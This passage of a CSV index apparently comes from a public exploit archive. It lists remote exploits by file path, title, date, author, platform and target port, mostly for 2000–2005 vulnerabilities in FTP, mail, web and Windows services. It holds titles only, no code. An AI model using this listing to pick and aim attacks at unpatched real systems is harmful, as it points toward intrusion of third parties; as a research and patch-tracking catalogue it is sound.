(with debug_mode) 1.2.26.1a - Remote Overflow",2003-11-20,xCrZx,linux,remote,80 -127,exploits/windows/remote/127.pl,"Opera 7.22 - File Creation and Execution (WebServer)",2003-11-22,nesumin,windows,remote, -130,exploits/windows/remote/130.c,"Microsoft Windows XP - Workstation Service Remote (MS03-049)",2003-12-04,fiNis,windows,remote, -132,exploits/linux/remote/132.c,"Apache 1.3.x < 2.0.48 mod_userdir - Remote Users Disclosure",2003-12-06,m00,linux,remote,80 -133,exploits/windows/remote/133.pl,"Eznet 3.5.0 - Remote Stack Overflow / Denial of Service",2003-12-15,"Peter Winter-Smith",windows,remote,80 -135,exploits/windows/remote/135.c,"Microsoft Windows Messenger Service (French) - Remote (MS03-043)",2003-12-16,MrNice,windows,remote,135 -136,exploits/windows/remote/136.pl,"Eznet 3.5.0 - Remote Stack Overflow Universal",2003-12-18,kralor,windows,remote,80 -139,exploits/linux/remote/139.c,"Cyrus IMSPD 1.7 - 'abook_dbname' Remote Code Execution",2003-12-27,SpikE,linux,remote,406 -143,exploits/linux/remote/143.c,"lftp 2.6.9 - Remote Stack based Overflow",2004-01-14,Li0n7,linux,remote, -149,exploits/windows/remote/149.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x - 'SITE CHMOD' Remote Overflow",2004-01-27,lion,windows,remote,21 -151,exploits/windows/remote/151.txt,"Microsoft Internet Explorer - URL Injection in History List (MS04-004)",2004-02-04,"Andreas Sandblad",windows,remote, -155,exploits/windows/remote/155.c,"Proxy-Pro Professional GateKeeper Pro 4.7 - Web proxy Remote Buffer Overflow",2004-02-26,kralor,windows,remote,3128 -156,exploits/windows/remote/156.c,"PSOProxy 0.91 (Windows 2000/XP) - Remote Buffer Overflow",2004-02-26,Rave,windows,remote,8080 -157,exploits/windows/remote/157.c,"IPSwitch IMail LDAP Daemon/Service - Remote Buffer Overflow",2004-02-27,"Johnny Cyberpunk",windows,remote,389 -158,exploits/windows/remote/158.c,"RhinoSoft Serv-U FTPd Server 3.x/4.x/5.x - 'MDTM' Remote Overflow",2004-02-27,Sam,windows,remote,21 -159,exploits/windows/remote/159.c,"WFTPD Server 3.21 - Remote Buffer Overflow",2004-02-29,rdxaxl,windows,remote,21 -163,exploits/windows/remote/163.pl,"Eudora 6.0.3 (Windows) - Attachment Spoofing",2004-03-19,anonymous,windows,remote, -164,exploits/windows/remote/164.c,"Foxmail 5.0 - 'PunyLib.dll' Remote Stack Overflow",2004-03-23,xfocus,windows,remote, -165,exploits/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21 -166,exploits/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80 -167,exploits/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow",2004-03-28,"Abhisek Datta",linux,remote, -168,exploits/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote, -169,exploits/hardware/remote/169.pl,"Cisco - Cisco Global er Tool",2004-03-28,blackangels,hardware,remote, -171,exploits/linux/remote/171.c,"tcpdump - ISAKMP Identification Payload Integer Overflow",2004-04-05,Rapid7,linux,remote, -173,exploits/linux/remote/173.pl,"Monit 4.1 - Remote Buffer Overflow",2004-04-09,gsicht,linux,remote,2812 -174,exploits/linux/remote/174.c,"Monit 4.2 - Remote Buffer Overflow",2004-04-12,"Abhisek Datta",linux,remote,2812 -175,exploits/windows/remote/175.pl,"eMule 0.42d - IRC Remote Buffer Overflow",2004-04-12,kingcope,windows,remote, -181,exploits/linux/remote/181.c,"Half Life - 'rcon' Remote Buffer Overflow",2000-11-16,"Sao Paulo",linux,remote,27015 -189,exploits/windows/remote/189.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (6)",2000-11-18,incubus,windows,remote,80 -190,exploits/windows/remote/190.c,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (9)",2000-11-18,Optyx,windows,remote,80 -191,exploits/windows/remote/191.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (7)",2000-11-18,steeLe,windows,remote,80 -192,exploits/windows/remote/192.pl,"Microsoft IIS 4.0/5.0 and PWS - Extended Unicode Directory Traversal (8)",2000-11-18,"Roelof Temmingh",windows,remote,80 -201,exploits/multiple/remote/201.c,"WU-FTPD 2.6.0 - Remote Command Execution",2000-11-21,venglin,multiple,remote,21 -204,exploits/linux/remote/204.c,"BFTPd - 'vsprintf()' Format Strings",2000-11-29,DiGiT,linux,remote,21 -208,exploits/linux/remote/208.c,"INND/NNRP < 1.6.x - Remote Overflow",2000-11-30,"Babcia Padlina",linux,remote,119 -211,exploits/cgi/remote/211.c,"PHF (Linux/x86) - Remote Buffer Overflow",2000-12-01,proton,cgi,remote, -213,exploits/solaris/remote/213.c,"Solaris sadmind - Remote Buffer Overflow",2000-12-01,Optyx,solaris,remote,111 -220,exploits/linux/remote/220.c,"PHP 3.0.16/4.0.2 - Remote Format Overflow",2000-12-06,Gneisenau,linux,remote,80 -225,exploits/linux/remote/225.c,"BFTPd 1.0.12 - Remote Overflow",2000-12-11,korty,linux,remote,21 -226,exploits/linux/remote/226.c,"LPRng 3.6.22/23/24 - Remote Command Execution",2000-12-11,sk8,linux,remote,515 -227,exploits/linux/remote/227.c,"LPRng (RedHat 7.0) - 'lpd' Format String",2000-12-11,DiGiT,linux,remote,515 -228,exploits/bsd/remote/228.c,"Oops! 1.4.6 - one russi4n proxy-server Heap Buffer Overflow",2000-12-15,diman,bsd,remote,3128 -230,exploits/linux/remote/230.c,"LPRng 3.6.24-1 - Remote Command Execution",2000-12-15,VeNoMouS,linux,remote,515 -232,exploits/windows/remote/232.c,"Check Point VPN-1/FireWall-1 4.1 SP2 - Blocked Port Bypass",2000-12-19,anonymous,windows,remote, -234,exploits/bsd/remote/234.c,"OpenBSD ftpd 2.6/2.7 - Remote Overflow",2000-12-20,Scrippie,bsd,remote,21 -237,exploits/linux/remote/237.c,"Linux Kernel 2.2 - TCP/IP Weakness Spoof IP",2001-01-02,Stealth,linux,remote,513 -239,exploits/solaris/remote/239.c,"WU-FTPD 2.6.0 - Remote Format Strings",2001-01-03,kalou,solaris,remote,21 -253,exploits/linux/remote/253.pl,"IMAP4rev1 10.190 - Authentication Stack Overflow",2001-01-19,teleh0r,linux,remote,143 -254,exploits/hardware/remote/254.c,"Cisco - Password Bruteforcer",2001-01-19,norby,hardware,remote,23 -263,exploits/solaris/remote/263.pl,"Netscape Enterprise Server 4.0/sparc/SunOS 5.7 - Remote Command Execution",2001-01-27,Fyodor,solaris,remote,80 -266,exploits/windows/remote/266.c,"Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (1)",2001-05-07,"Ryan Permeh",windows,remote,80 -268,exploits/windows/remote/268.c,"Microsoft Windows Server 2000 SP1/SP2 - isapi .printer Extension Overflow (2)",2001-05-08,"dark spyrit",windows,remote,80 -269,exploits/lin_x86/remote/269.c,"BeroFTPD 1.3.4(1) (Linux x86) - Remote Code Execution",2001-05-08,qitest1,lin_x86,remote,21 -275,exploits/windows/remote/275.c,"Microsoft IIS 5.0 - SSL Remote Buffer Overflow (MS04-011)",2004-04-21,"Johnny Cyberpunk",windows,remote,443 -277,exploits/linux/remote/277.c,"ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (1)",2001-03-01,Gneisenau,linux,remote,53 -279,exploits/linux/remote/279.c,"ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (2)",2001-03-01,LSD-PLaNET,linux,remote,53 -280,exploits/solaris/remote/280.c,"ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (3)",2001-03-01,LSD-PLaNET,solaris,remote,53 -282,exploits/linux/remote/282.c,"ISC BIND 8.2.x - 'TSIG' Remote Stack Overflow (4)",2001-03-02,multiple,linux,remote,53 -284,exploits/linux/remote/284.c,"IMAP4rev1 12.261/12.264/2000.284 - 'lsub' Remote Overflow",2001-03-03,SkyLaZarT,linux,remote,143 -293,exploits/windows/remote/293.c,"Microsoft Windows - 'Lsasrv.dll' RPC Remote Buffer Overflow (MS04-011)",2004-04-24,sbaa,windows,remote,445 -294,exploits/hardware/remote/294.pl,"HP Web JetAdmin 6.5 - 'connectedNodes.ovpl' Remote Code Execution",2004-04-28,FX,hardware,remote,8000 -295,exploits/windows/remote/295.c,"Microsoft Windows XP/2000 - 'Lsasrv.dll' Remote Universal (MS04-011)",2004-04-29,houseofdabus,windows,remote,445 -296,exploits/linux/remote/296.c,"XChat 1.8.0/2.0.8 socks5 - Remote Buffer Overflow",2004-05-05,vade79,linux,remote, -297,exploits/windows/remote/297.c,"Sasser Worm ftpd - Remote Buffer Overflow (port 5554)",2004-05-16,mandragore,windows,remote,5554 -300,exploits/multiple/remote/300.c,"CVS (Linux/FreeBSD) - Remote Entry Line Heap Overflow",2004-06-25,Ac1dB1tCh3z,multiple,remote,2401 -301,exploits/solaris/remote/301.c,"CVS - Remote Entry Line Root Heap Overflow",2004-06-25,anonymous,solaris,remote,2401 -303,exploits/linux/remote/303.pl,"Borland Interbase 7.x - Remote Buffer Overflow",2004-06-25,"Aviram Jenik",linux,remote,3050 -304,exploits/linux/remote/304.c,"Subversion 1.0.2 - 'svn_time_from_cstring()' Remote Overflow",2004-06-25,"Gyan Chawdhary",linux,remote,3690 -307,exploits/linux/remote/307.py,"Rlpr 2.04 - 'msg()' Remote Format String",2004-06-25,jaguar,linux,remote,7290 -308,exploits/linux/remote/308.c,"MPlayer 1.0pre4 GUI - Filename handling Overflow",2004-07-04,c0ntex,linux,remote, -310,exploits/windows/remote/310.txt,"Microsoft Internet Explorer - Remote Application.Shell",2004-07-09,Jelmer,windows,remote, -311,exploits/multiple/remote/311.pl,"MySQL 4.1/5.0 - Zero-Length Password Authentication Bypass",2004-07-10,"Eli Kara",multiple,remote,3306 -313,exploits/windows/remote/313.txt,"Microsoft Outlook Express - Window Opener",2004-07-13,anonymous,windows,remote, -315,exploits/windows/remote/315.txt,"Microsoft Outlook Express - JavaScript Execution",2004-07-13,anonymous,windows,remote, -316,exploits/windows/remote/316.txt,"Microsoft Internet Explorer - Remote Wscript.Shell",2004-07-13,"Ferruh Mavituna",windows,remote, -340,exploits/linux/remote/340.c,"Linux imapd - Remote Overflow / File Retrieve",1997-06-24,p1,linux,remote,143 -346,exploits/linux_sparc/remote/346.c,"Solaris /bin/login (SPARC/x86) - Remote Code Execution",2001-12-20,Teso,linux_sparc,remote,23 -347,exploits/linux/remote/347.c,"Squid 2.4.1 - Remote Buffer Overflow",2002-05-14,Teso,linux,remote, -348,exploits/linux/remote/348.c,"WU-FTPD 2.6.1 - Remote Command Execution",2002-05-14,Teso,linux,remote,21 -349,exploits/multiple/remote/349.txt,"SSH (x2) - Remote Command Execution",2002-05-01,Teso,multiple,remote,22 -359,exploits/linux/remote/359.c,"Drcat 0.5.0-beta - 'drcatd' Remote Code Execution",2004-07-22,Taif,linux,remote,3535 -361,exploits/windows/remote/361.txt,"Flash FTP Server - Directory Traversal",2004-07-22,CoolICE,windows,remote, -364,exploits/linux/remote/364.pl,"Samba 3.0.4 - SWAT Authorisation Buffer Overflow",2004-07-22,"Noam Rathaus",linux,remote,901 -372,exploits/linux/remote/372.c,"OpenFTPd 0.30.2 - Remote Overflow",2004-08-03,Andi,linux,remote,21 -373,exploits/linux/remote/373.c,"OpenFTPd 0.30.1 - message system Remote Shell",2004-08-04,infamous41md,linux,remote,21 -378,exploits/windows/remote/378.pl,"BlackJumboDog FTP Server - Remote Buffer Overflow",2004-08-05,"Tal Zeltzer",windows,remote,21 -379,exploits/linux/remote/379.txt,"CVSTrac - Arbitrary Code Execution",2004-08-06,anonymous,linux,remote, -380,exploits/linux/remote/380.c,"Pavuk Digest - Authentication Remote Buffer Overflow",2004-08-08,infamous41md,linux,remote,80 -382,exploits/linux/remote/382.c,"Melange Chat Server 1.10 - Remote Buffer Overflow",2002-12-24,innerphobia,linux,remote, -386,exploits/linux/remote/386.c,"xine 0.99.2 - Remote Stack Overflow",2004-08-09,c0ntex,linux,remote,80 -387,exploits/linux/remote/387.c,"Dropbear SSH 0.34 - Remote Code Execution",2004-08-09,livenn,linux,remote,22 -389,exploits/linux/remote/389.c,"LibPNG Graphics Library - Remote Buffer Overflow",2004-08-11,infamous41md,linux,remote, -390,exploits/linux/remote/390.c,"GV PostScript Viewer - Remote Buffer Overflow (1)",2004-08-13,infamous41md,linux,remote, -391,exploits/osx/remote/391.pl,"Apple Mac OSX 10.3.3 - AppleFileServer Overflow Remote Code Execution",2004-08-13,"Dino Dai Zovi",osx,remote,548 -392,exploits/linux/remote/392.c,"Remote CVS 1.11.15 - 'error_prog_name' Arbitrary Code Execution",2004-08-13,"Gyan Chawdhary",linux,remote,2401 -397,exploits/linux/remote/397.c,"WU-IMAP 2000.287(1-2) - Remote Overflow",2002-06-25,Teso,linux,remote,143 -398,exploits/linux/remote/398.c,"rsync 2.5.1 - Remote (1)",2002-01-01,Teso,linux,remote,873 -399,exploits/linux/remote/399.c,"rsync 2.5.1 - Remote (2)",2002-01-01,Teso,linux,remote,873 -400,exploits/linux/remote/400.c,"GV PostScript Viewer - Remote Buffer Overflow (2)",2004-08-18,infamous41md,linux,remote, -404,exploits/linux/remote/404.pl,"PlaySms 0.7 - SQL Injection",2004-08-19,"Noam Rathaus",linux,remote, -408,exploits/linux/remote/408.c,"Qt - '.bmp' Parsing Bug Heap Overflow",2004-08-21,infamous41md,linux,remote, -409,exploits/bsd/remote/409.c,"BSD - 'TelnetD' Remote Command Execution (1)",2001-06-09,Teso,bsd,remote,23 -413,exploits/linux/remote/413.c,"MusicDaemon 0.0.3 - Remote Denial of Service / '/etc/shadow' Stealer (2)",2004-08-24,Tal0n,linux,remote, -416,exploits/linux/remote/416.c,"Hafiye 1.0 - Remote Terminal Escape Sequence Injection",2004-08-25,"Serkan Akpolat",linux,remote, -418,exploits/windows/remote/418.c,"Winamp 5.04 - '.wsz' Skin File Remote Code Execution",2004-08-25,"Petrol Designs",windows,remote, -421,exploits/windows/remote/421.c,"Gaucho 1.4 - Mail Client Buffer Overflow",2004-08-27,"Tan Chew Keong",windows,remote, -424,exploits/linux/remote/424.c,"Citadel/UX - Remote Buffer Overflow",2004-08-30,Nebunu,linux,remote,504 -425,exploits/hardware/remote/425.c,"D-Link DCS-900 Camera - Remote IP Address Changer",2004-08-31,anonymous,hardware,remote, -426,exploits/windows/remote/426.c,"Titan FTP Server - Long Command Heap Overflow (PoC)",2004-08-31,lion,windows,remote,21 -431,exploits/windows/remote/431.c,"AOL Instant Messenger AIM - 'Away' Message Remote (2)",2004-09-02,"John Bissell",windows,remote, -432,exploits/bsd/remote/432.c,"Courier-IMAP 3.0.2-r1 - 'auth_debug()' Remote Format String",2004-09-02,ktha,bsd,remote,143 -435,exploits/windows/remote/435.c,"Trillian 0.74i MSN Module - Remote Buffer Overflow",2004-09-08,Komrade,windows,remote, -437,exploits/linux/remote/437.c,"Citadel/UX 6.23 - Remote USER Directive",2004-09-09,Nebunu,linux,remote,504 -439,exploits/windows/remote/439.c,"BlackJumboDog FTP Server 3.6.1 - Remote Buffer Overflow",2004-09-12,Delikon,windows,remote,21 -472,exploits/windows/remote/472.c,"Microsoft Windows - JPEG GDI+ Overflow Shellcode",2004-09-22,FoToZ,windows,remote, -473,exploits/windows/remote/473.c,"Alt-N MDaemon 6.5.1 - IMAP/SMTP Remote Buffer Overflow",2004-09-22,D_BuG,windows,remote,143 -475,exploits/windows/remote/475.sh,"Microsoft Windows - JPEG GDI+ Overflow Administrator (MS04-028)",2004-09-23,"Elia Florio",windows,remote, -478,exploits/windows/remote/478.c,"Microsoft Windows - JPEG GDI+ Overflow Download Shellcode (MS04-028)",2004-09-25,ATmaCA,windows,remote, -480,exploits/windows/remote/480.c,"Microsoft Windows - JPEG GDI+ Remote Heap Overflow (MS04-028)",2004-09-25,"John Bissell",windows,remote, -556,exploits/windows/remote/556.c,"Microsoft Windows - JPEG GDI+ All-in-One Bind/Reverse/Admin/FileDownload",2004-09-27,M4Z3R,windows,remote, -566,exploits/windows/remote/566.pl,"IPSwitch WhatsUp Gold 8.03 - Remote Buffer Overflow",2004-10-04,LoWNOISE,windows,remote,80 -568,exploits/windows/remote/568.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (1)",2004-10-06,Delikon,windows,remote,8000 -572,exploits/windows/remote/572.pl,"Eudora 6.2.0.7 - Attachment Spoofer",2004-10-11,"Paul Szabo",windows,remote, -573,exploits/windows/remote/573.c,"Icecast 2.0.1 (Win32) - Remote Code Execution (2)",2004-10-12,K-C0d3r,windows,remote,8000 -577,exploits/windows/remote/577.c,"YahooPOPs 1.6 - SMTP Port Buffer Overflow",2004-10-15,class101,windows,remote,25 -580,exploits/linux/remote/580.c,"Monit 4.2 - Basic Authentication Remote Code Execution",2004-10-17,rtk,linux,remote,2812 -581,exploits/linux/remote/581.c,"ProFTPd 1.2.10 - Remote Users Enumeration",2004-10-17,"Leon Juranic",linux,remote, -582,exploits/windows/remote/582.c,"YahooPOPs 1.6 - SMTP Remote Buffer Overflow",2004-10-18,"Diabolic Crab",windows,remote,25 -583,exploits/windows/remote/583.pl,"SLX Server 6.1 - Arbitrary File Creation (PoC)",2004-10-18,"Carl Livitt",windows,remote, -584,exploits/win_x86/remote/584.c,"Microsoft Windows (x86) - Metafile '.emf' Heap Overflow (MS04-032)",2004-10-20,houseofdabus,win_x86,remote, -588,exploits/windows/remote/588.py,"Ability Server 2.34 - FTP 'STOR' Remote Buffer Overflow",2004-10-21,muts,windows,remote,21 -589,exploits/windows/remote/589.html,"Multiple Browsers - Tabbed Browsing",2004-10-22,"Jakob Balle",windows,remote, -590,exploits/windows/remote/590.c,"ShixxNOTE 6.net - Remote Buffer Overflow",2004-10-22,class101,windows,remote,2000 -592,exploits/windows/remote/592.py,"Ability Server 2.34 - 'APPE' Remote Buffer Overflow",2004-10-23,KaGra,windows,remote,21 -598,exploits/windows/remote/598.py,"TABS MailCarrier 2.51 - SMTP 'EHLO' / 'HELO' Remote Buffer Overflow",2004-10-26,muts,windows,remote,25 -608,exploits/linux/remote/608.c,"WvTFTPd 0.9 - Remote Heap Overflow",2004-10-28,infamous41md,linux,remote,69 -609,exploits/linux/remote/609.txt,"zgv 5.5 - Multiple Arbitrary Code Executions (PoC)",2004-10-28,infamous41md,linux,remote, -612,exploits/windows/remote/612.html,"Microsoft Internet Explorer 6 - IFRAME Tag Buffer Overflow",2004-11-02,Skylined,windows,remote, -616,exploits/windows/remote/616.c,"MiniShare 1.4.1 - Remote Buffer Overflow (1)",2004-11-07,class101,windows,remote,80 -618,exploits/windows/remote/618.c,"Ability Server 2.34 (Unix) - FTP 'STOR' Remote Buffer Overflow",2004-11-07,NoPh0BiA,windows,remote,21 -619,exploits/windows/remote/619.c,"CCProxy Log - Remote Stack Overflow",2004-11-09,Ruder,windows,remote,808 -620,exploits/linux/remote/620.c,"Qwik SMTP 0.3 - Format String",2004-11-09,"Carlos Barros",linux,remote,25 -621,exploits/windows/remote/621.c,"CCProxy 6.2 - 'ping' Remote Buffer Overflow",2004-11-10,KaGra,windows,remote,23 -623,exploits/windows/remote/623.c,"SlimFTPd 3.15 - Remote Buffer Overflow",2004-11-10,class101,windows,remote,21 -627,exploits/windows/remote/627.pl,"IPSwitch IMail 8.13 - 'DELETE' Remote Stack Overflow",2004-11-12,Zatlander,windows,remote,143 -636,exploits/windows/remote/636.c,"MiniShare 1.4.1 - Remote Buffer Overflow (2)",2004-11-16,NoPh0BiA,windows,remote,80 -637,exploits/windows/remote/637.c,"TABS MailCarrier 2.51 - Remote Buffer Overflow",2004-11-16,NoPh0BiA,windows,remote,25 -638,exploits/windows/remote/638.py,"Seattle Lab Mail (SLmail) 5.5 - POP3 'PASS' Remote Buffer Overflow (1)",2004-11-18,muts,windows,remote,110 -640,exploits/windows/remote/640.c,"Microsoft Windows - Compressed Zipped Folders (MS04-034)",2004-11-19,tarako,windows,remote, -641,exploits/windows/remote/641.txt,"Microsoft Internet Explorer 6.0 SP2 - File Download Security Warning Bypass",2004-11-19,cyber_flash,windows,remote, -644,exploits/windows/remote/644.pl,"DMS POP3 Server 1.5.3 build 37 - Remote Buffer Overflow",2004-11-21,"Reed Arvin",windows,remote,110 -650,exploits/windows/remote/650.c,"CoffeeCup FTP Clients (Direct 6.2.0.62) (Free 3.0.0.10) - Remote Buffer Overflow",2004-11-22,Komrade,windows,remote, -652,exploits/linux/remote/652.c,"Prozilla 1.3.6 - Remote Stack Overflow",2004-11-23,"Serkan Akpolat",linux,remote,8080 -654,exploits/windows/remote/654.c,"Winamp 5.06 - 'IN_CDDA.dll' Remote Buffer Overflow",2004-11-24,k-otik,windows,remote, -658,exploits/windows/remote/658.c,"MailEnable Mail Server IMAP 1.52 - Remote Buffer Overflow",2004-11-25,class101,windows,remote,143 -660,exploits/linux/remote/660.c,"PHP 4.3.7/5.0.0RC3 - 'memory_limit' Remote Overflow",2004-11-27,"Gyan Chawdhary",linux,remote,80 -663,exploits/windows/remote/663.py,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (3)",2004-11-29,muts,windows,remote,143 -668,exploits/windows/remote/668.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (1)",2004-11-30,JohnH,windows,remote,143 -670,exploits/windows/remote/670.c,"Mercury/32 Mail Server 4.01 - 'Pegasus' IMAP Buffer Overflow (2)",2004-12-01,JohnH,windows,remote,143 -675,exploits/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,windows,remote, -681,exploits/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,linux,remote,504 -689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,multiple,remote, -693,exploits/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,windows,remote,21 -705,exploits/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,multiple,remote,10000 -711,exploits/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,windows,remote,21 -712,exploits/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow",2004-12-23,pucik,linux,remote,8000 -716,exploits/solaris/remote/716.c,"Solaris 2.5.1/2.6/7/8 rlogin (SPARC) - '/bin/login' Remote Buffer Overflow",2004-12-24,"Marco Ivaldi",solaris,remote,513 -719,exploits/windows/remote/719.txt,"Microsoft Internet Explorer (Windows XP SP2) - HTML Help Control Local Zone Bypass",2004-12-25,Paul,windows,remote, -726,exploits/windows/remote/726.c,"Netcat 1.1 - '-e' Switch Remote Buffer Overflow",2004-12-26,class101,windows,remote, -729,exploits/windows/remote/729.txt,"PHP 4.3.7 - 'openlog()' Remote Buffer Overflow",2004-12-28,"The Warlock [BhQ]",windows,remote,80 -730,exploits/windows/remote/730.html,"Microsoft Internet Explorer - Remote Code Execution (PoC)",2004-12-28,ShredderSub7,windows,remote, -733,exploits/windows/remote/733.c,"Microsoft Windows Server 2000 - WINS Remote Code Execution",2004-12-31,zuc,windows,remote,42 -734,exploits/windows/remote/734.c,"Microsoft Windows - NetDDE Remote Buffer Overflow (MS04-031)",2004-12-31,houseofdabus,windows,remote,139 -745,exploits/multiple/remote/745.cgi,"Webmin 1.5 - Web Brute Force (CGI)",2005-01-08,ZzagorR,multiple,remote,10000 -746,exploits/multiple/remote/746.pl,"Webmin 1.5 - Brute Force / Command Execution",2005-01-08,ZzagorR,multiple,remote,10000 -750,exploits/windows/remote/750.c,"Veritas Backup Exec Agent 8.x/9.x - Browser Overflow",2005-01-11,class101,windows,remote,6101 -753,exploits/windows/remote/753.html,"Microsoft Internet Explorer - '.ANI' Remote Stack Overflow (MS05-002) (2)",2005-01-12,Skylined,windows,remote, -759,exploits/windows/remote/759.cpp,"Apple iTunes - Playlist Buffer Overflow Download Shellcode",2005-01-16,ATmaCA,windows,remote, -761,exploits/windows/remote/761.cpp,"NodeManager Professional 2.00 - Remote Buffer Overflow",2005-01-18,"Tan Chew Keong",windows,remote,162 -764,exploits/unix/remote/764.c,"Apache mod_ssl < 2.8.7 OpenSSL - 'OpenFuckV2.c' Remote Buffer Overflow",2003-04-04,spabam,unix,remote,80 -765,exploits/windows/remote/765.c,"Microsoft Internet Explorer - '.ANI' Universal (MS05-002)",2005-01-22,houseofdabus,windows,remote, -767,exploits/windows/remote/767.pl,"Golden FTP Server 2.02b - Remote Buffer Overflow",2005-01-22,Barabas,windows,remote,21 -771,exploits/windows/remote/771.cpp,"Microsoft Internet Explorer - '.ANI' Downloader (MS05-002)",2005-01-24,Vertygo,windows,remote, -775,exploits/linux/remote/775.c,"Berlios GPSD 2.7.x - Remote Format String",2005-01-26,JohnH,linux,remote,2947 -781,exploits/windows/remote/781.py,"Savant Web Server 3.1 - Remote Buffer Overflow (1)",2005-02-01,"Tal Zeltzer",windows,remote,80 -784,exploits/linux/remote/784.c,"ngIRCd 0.8.2 - Remote Format String",2005-02-03,CoKi,linux,remote,6667 -785,exploits/linux/remote/785.c,"Newspost 2.1 - 'socket_getline()' Remote Buffer Overflow (2)",2005-02-03,cybertronic,linux,remote,119 -787,exploits/windows/remote/787.pl,"Savant Web Server 3.1 (Windows 2003) - Remote Buffer Overflow",2005-02-04,CorryL,windows,remote,80 -794,exploits/windows/remote/794.c,"3CServer 1.1 (FTP Server) - Remote Overflow",2005-02-07,mandragore,windows,remote,21 -802,exploits/windows/remote/802.cpp,"MSN Messenger - '.png' Image Buffer Overflow Download Shellcode",2005-02-09,ATmaCA,windows,remote, -804,exploits/windows/remote/804.c,"MSN Messenger (Linux) - '.png' Image Buffer Overflow",2005-02-09,dgr,windows,remote, -805,exploits/multiple/remote/805.c,"ELOG 2.5.6 - Remote Shell",2005-02-09,n4rk0tix,multiple,remote,8080 -806,exploits/linux/remote/806.c,"Prozilla 1.3.7.3 - Remote Format String",2005-02-09,"Serkan Akpolat",linux,remote,8080 -812,exploits/linux/remote/812.c,"Exim 4.43 - 'auth_spa_server()' Remote (PoC)",2005-02-12,"Yuri Gushin",linux,remote,25 -819,exploits/windows/remote/819.py,"Savant Web Server 3.1 (French Windows)- Remote Buffer Overflow",2005-02-15,"Jerome Athias",windows,remote,80 -822,exploits/windows/remote/822.c,"RhinoSoft Serv-U FTPd Server 4.x - 'site chmod' Remote Buffer Overflow",2004-01-30,Skylined,windows,remote,21 -823,exploits/windows/remote/823.c,"BolinTech DreamFTP Server 1.2 (1.02/TryFTP 1.0.0.1) - Remote User Name Format String",2004-02-11,Skylined,windows,remote,21 -825,exploits/windows/remote/825.c,"3Com FTP Server 2.0 - Remote Overflow",2005-02-17,c0d3r,windows,remote,21 -826,exploits/linux/remote/826.c,"Medal of Honor Spearhead (Linux) - Server Remote Buffer Overflow",2005-02-18,millhouse,linux,remote,12203 -827,exploits/windows/remote/827.c,"3Com 3CDaemon FTP - Unauthorized 'USER' Remote Buffer Overflow",2005-02-18,class101,windows,remote,21 -828,exploits/multiple/remote/828.c,"Knox Arkeia Server Backup 5.3.x - Remote Code Execution",2005-02-18,"John Doe",multiple,remote,617 -829,exploits/hardware/remote/829.c,"Thomson TCW690 - POST Password Validation",2005-02-19,MurDoK,hardware,remote,80 -830,exploits/windows/remote/830.c,"SHOUTcast 1.9.4 (Windows) - File Request Format String Remote Overflow",2005-02-19,mandragore,windows,remote,8000 -831,exploits/linux/remote/831.c,"GNU Cfengine 2.17p1 - RSA Authentication Heap Overflow",2005-02-20,jsk,linux,remote,5803 -845,exploits/windows/remote/845.c,"BadBlue 2.5 - Easy File Sharing Remote Buffer Overflow",2005-02-27,class101,windows,remote,80 -847,exploits/windows/remote/847.cpp,"BadBlue 2.55 - Web Server Remote Buffer Overflow",2005-02-27,tarako,windows,remote,80 -854,exploits/windows/remote/854.cpp,"Foxmail 1.1.0.1 - POP3 Temp Dir Stack Overflow",2005-03-02,Swan,windows,remote,110 -859,exploits/windows/remote/859.c,"CA License Server - 'GETCONFIG' Remote Buffer Overflow",2005-03-06,class101,windows,remote,10203 -868,exploits/windows/remote/868.cpp,"Microsoft Internet Explorer - 'mshtml.dll' CSS Parsing Buffer Overflow",2005-03-09,Arabteam2000,windows,remote, -875,exploits/windows/remote/875.c,"Sentinel LM 7.x - UDP License Service Remote Buffer Overflow",2005-03-13,class101,windows,remote,5093 -878,exploits/linux/remote/878.c,"Ethereal 0.10.9 (Linux) - '3G-A11' Remote Buffer Overflow",2005-03-14,"Diego Giagio",linux,remote, -879,exploits/multiple/remote/879.pl,"LimeWire 4.1.2 < 4.5.6 - 'GET' Remote File Read",2005-03-14,lammat,multiple,remote, -883,exploits/windows/remote/883.c,"GoodTech Telnet Server < 5.0.7 - Remote Buffer Overflow (2)",2005-04-24,cybertronic,windows,remote,2380 -900,exploits/linux/remote/900.c,"Smail 3.2.0.120 - Remote Heap Overflow",2005-03-28,infamous41md,linux,remote,25 -902,exploits/linux/remote/902.c,"mtftpd 0.0.3 - Remote Code Execution",2005-03-29,darkeagle,linux,remote,21 -903,exploits/linux/remote/903.c,"Cyrus imapd 2.2.4 < 2.2.8 - 'imapmagicplus' Remote Overflow",2005-03-29,crash-x,linux,remote,143 -906,exploits/windows/remote/906.c,"BakBone NetVault 6.x/7.x - Remote Heap Buffer Overflow (2)",2005-04-01,class101,windows,remote,20031 -909,exploits/windows/remote/909.cpp,"Microsoft Windows - 'WINS' Remote Buffer Overflow (MS04-045) 